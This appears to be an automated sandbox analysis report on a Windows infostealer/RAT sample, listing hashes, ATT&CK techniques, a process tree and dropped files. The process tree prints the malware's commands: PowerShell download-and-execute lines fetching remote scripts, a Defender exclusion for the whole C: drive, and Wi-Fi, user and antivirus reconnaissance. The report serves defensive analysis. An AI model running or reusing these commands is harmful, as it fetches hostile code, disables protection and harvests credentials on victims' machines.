Analysis
-
max time kernel
137s -
max time network
108s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
25/08/2024, 04:30
General
-
Target
2024-08-25_80ee3238270f38c66068799b020b2fe6_poet-rat_snatch.exe
-
Size
14.0MB
-
MD5
80ee3238270f38c66068799b020b2fe6
-
SHA1
32b6ea2a6fc2c5b2821694a0d8e1f6c3a8faaead
-
SHA256
8c5f32cc741cbe94cc0d2af542cb88b9f583e5d8e51b754f6ffc052cd9998e79
-
SHA512
fd92cabbdc28da85f5c4bd30924425dc2b165a437b7da0e35b4d71eb534941040135c255d3f9c50e4b0c52c8de8ddbea7beb092c1175de1cdbb6872c6988d160
-
SSDEEP
196608:f247x52HYiTv51K4iIfPIC9zMdfarCB2YuADk0korks:fxxkTb94C9wkg2xWk0koQs
Malware Config
Signatures
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Modifies Windows Firewall 2 TTPs 1 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Network Service Discovery 1 TTPs 1 IoCs
Attempt to gather information on host's network.
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
System Network Connections Discovery 1 TTPs 1 IoCs
Attempt to get a listing of network connections.
-
Gathers network information 2 TTPs 3 IoCs
Uses commandline utility to view network configuration.
-
Kills process with taskkill 1 IoCs
-
Modifies Control Panel 2 IoCs
-
Modifies system certificate store 2 TTPs 3 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 60 IoCs
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\2024-08-25_80ee3238270f38c66068799b020b2fe6_poet-rat_snatch.exe"C:\Users\Admin\AppData\Local\Temp\2024-08-25_80ee3238270f38c66068799b020b2fe6_poet-rat_snatch.exe"1⤵
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qzg1enrz\qzg1enrz.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA6B0.tmp" "c:\Users\Admin\AppData\Local\Temp\qzg1enrz\CSC621F90E12C744A88AECAADD4B4518DEC.TMP"4⤵
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ilzkk5hh\ilzkk5hh.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAA88.tmp" "c:\Users\Admin\AppData\Local\Temp\ilzkk5hh\CSCE541AD0D8C44DF9B2C53A342D8CDDA1.TMP"4⤵
-
-
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" wlan show profiles3⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup administrators3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators4⤵
-
-
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall show allprofiles3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /all3⤵
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" user3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user4⤵
-
-
-
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /displaydns3⤵
- Gathers network information
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup4⤵
-
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" startup get command caption3⤵
-
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -ano3⤵
- System Network Connections Discovery
- Gathers network information
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe3⤵
-
-
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /all3⤵
- Gathers network information
-
-
C:\Windows\system32\ROUTE.EXE"C:\Windows\system32\ROUTE.EXE" print3⤵
-
-
C:\Windows\system32\ARP.EXE"C:\Windows\system32\ARP.EXE" -a3⤵
- Network Service Discovery
-
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" wlan show profile3⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -C "Add-MpPreference -ExclusionPath 'C:'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\cmd.execmd.exe /c start facebook.com2⤵
-
-
C:\Windows\system32\attrib.exeattrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps12⤵
- Views/modifies file attributes
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exePowerShell -Command "(New-Object -ComObject SAPI.SpVoice).Speak(\"hey hey\")"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\cmd.execmd /c rundll32.exe user32.dll,SwapMouseButton2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exerundll32.exe user32.dll,SwapMouseButton3⤵
-
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM wallpaper32.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x50c 0x4fc1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Persistence
Account Manipulation
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Account Manipulation
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
2Subvert Trust Controls
1Install Root Certificate
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
1KB
MD5d71c7d15748177ac7bda63669279b7bd
SHA1927891cd898e24ccafa1c8dcb79853126953bd3e
SHA2560f7d506057ea592aa234bc3e6982d2133e2dd3b67bf75678c8b4132f5b50972d
SHA512fb410da790bdc39eb745c3fd35eb4c1ca2202ce88739ac80f3b061a650544991622512658e482eb124fa6c39ff99ccd95cad74e26dd7804c439dc7b9345ea2a1
-
Filesize
1KB
MD5e1567fd9e93d88c7b1c1144280393e83
SHA18b7fb60ed13946307d12158c4f788867e8d2e721
SHA25619ef62498e9c39d9f1beac01f128f4d297d078dbf0741775aafd1f68b9d76338
SHA512bd4487c71381e1054d1fa6465b1414bde5dcff606239aeb07edf838543b0ead3831bb7de93fafa424d8202a080435db8ceeab52a1c9da9caea09a0c50c511dac
-
Filesize
1KB
MD5579c6e465a86fb413710d47da4b10497
SHA1a96f55236f30297eff9607d3e7bc9bd961c14c12
SHA25603d3318153697f41a5756f7e9e3fe0769e3aa3ccf93c40bc2e795f7417f1cc20
SHA512a29f19af9975be5423a32b06b5bea5908e072f5179389ede43354395490fabc486341b9e231615968bb20dc85c50cbf283705fedd6353a271572eb84258af69c
-
Filesize
1KB
MD50ae3bdb2a723f2280b7a6b13b136c0d1
SHA19d94b98afe1c154a466af1fb89d61d864bfc8f40
SHA256b6563132624de097c82b4323f2f28c736637471ebcdaba263cccd737a014185a
SHA5123e4aba605d2231a64c0a27c486f86a5a3ca04af301a95d409c14586ae108ba0b1cc7d61272b61b387ad4d2ab5e3408500606c68f04dc5299374da5d137b0bb9e
-
Filesize
1KB
MD5a06c51a0d0b843a7b12d643c37946cf9
SHA179774763569b8c44aa01599b98fcb54fef3dc9d2
SHA256fd52410bd8f70c1e80d1af94d69298d595028d9442e81976e667f1bddf605360
SHA51246847c4e70914b9f99e464448a15e29bb030e10c7eb6daa4ef58c528b4d1b5fa783c85d34fa8eb1bf8f47d0781fceff58e480f92544232a1c1ecb76aa8bb6a43
-
Filesize
97KB
MD503e74958498ed04e79b4f4172146b82f
SHA1255d3d9095f9c91679b923e3d64cbf8209bb9276
SHA2564a7b8c95889c773937f849588d3eb2ed99039e69ced856f275aba6de182bb284
SHA512104e7c019d1bc4e54975caae682c203eb1ca488af592f98e81dc113d99f149bd5dad5b6661f4e40f14569754e0346b98d40141e1a95d04c06d3020d53ed83169
-
Filesize
24KB
MD5d2628951354c15f2bc815dd1d17fb387
SHA15e1e13dd07d37fbdafd7691951ae21e0013479a6
SHA2562a4df1377961cfa2bceb7d3469e3841546d326f92e7abae517d587e29b29273e
SHA51233240ecf7b17bb9da62ffeb779df1c9cf7617e5cca4a4ed5804562b1a0a7e791c281ca0bc99de8d6863e6629324759cb0ce480b42ff5098bc1f87ab3929353b5
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD56232ec1edb85a6c82df6d6e13c16296a
SHA12886dfed085f10fae5ac515956bca89e790d484a
SHA25606ab79bde31a6ccaab59096b439405d3524d3f284501cfd919209f2ee732aafe
SHA5129f8919395cc542bee113e068b62dc971cd78985ab3da64f7393b0935c7e81cbe8b7634f24428bd788dfa82e82adb72871219403bdd4198286c629da63389593a
-
Filesize
4KB
MD502578006aea569023f2cd82efc882cc7
SHA1ce5c941430d2c4ea7bf1a3cc7ca93fafa03d73f6
SHA25647fcc6790f76ad3621c9296d79e6fb966ff20464151de3037288e00b94d48251
SHA5123388f3813feae030d2fb6c153ba688656fc4d294924e1b7d890fe441dee53e0b9e8692855687b6f046b2c4740ffdcc54a71921a0b5399bb79b7d3c9cedac0eee
-
Filesize
2KB
MD59758656bbe8589c66bb241b052490c72
SHA1b73da83fb3ae6b86c6365769a04de9845d5c602c
SHA256e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351
SHA512da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34
-
Filesize
652B
MD52f6cbd7fa973dc6f7c11ab22b50f6443
SHA1bdf0b62252399ab7afdf927725bc08bf0cd76769
SHA2569d891d6a8f4352743d569ef466b703ed545b20f08380456a8ab00a3115f6d889
SHA5121e07e2c6fd601a3ca9a757e2b893bf66c0f7dd526e27629d69bb630ecbdd9583cebf85bf60450a6efab41dfd0f372030e2005f7f596086b1042f9651a6c7756d
-
Filesize
369B
MD5cfd452d38eb3e4e01af1d4d848c81294
SHA16ac5ea48eca452f31b079b7a5e6bbcd0122da35f
SHA256a02400a4ecc408deba347c34db874cbe2303b153b31407c957cd7dfb694885e4
SHA512d889030722fc957a4b5a8a83c47c87e4b5f657a8400b089e8a62065850d673025bdc9a2b04bd869f44fdb4e881122d78bd4551dbfd1ba9515aee098001500e29
-
Filesize
652B
MD5913e872b8dd76a4e0deedac74d59044f
SHA1b26d829e9355e344b0c48794fa440cd37ff75aa6
SHA256023cbc2f7020443cd3100561f59bf317b620fc54b96c07ff7ec82fe47a776395
SHA512b8230189c1074fb193270084af5f825092f670589c0c35be74381f686f3da0ebf7218fe3881f1adadfbb0c5755132f9bd03cae82e6f5e178aff0f275d8983672
-
Filesize
1KB
MD58a1e7edb2117ec5dde9a07016905923b
SHA10155dbeeb16333e2eaa767b0209750efee56f47f
SHA256c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007
SHA5124ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21
-
Filesize
369B
MD51315f22786c4937f1fe8b3fe2c99a036
SHA1aa850d861166f960fd4a014590db3731e69f6e1d
SHA256ed0a6f86afd70689ac868368445883ab595a4cdadd92c41d9c55ed01fcb3148d
SHA512040e41d293e50fd28d486c48d191e7eef80b6b6d3567846d3043bdfccafbbb1e07db92dd5c3703cf24cd41a4db2df236b6ea98df3c81e04dc8e69110b3517abf
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
144KB
-
Filesize
7.6MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
40KB
-
Filesize
72KB
-
Filesize
32KB
-
Filesize
168KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
32KB
-
Filesize
10.8MB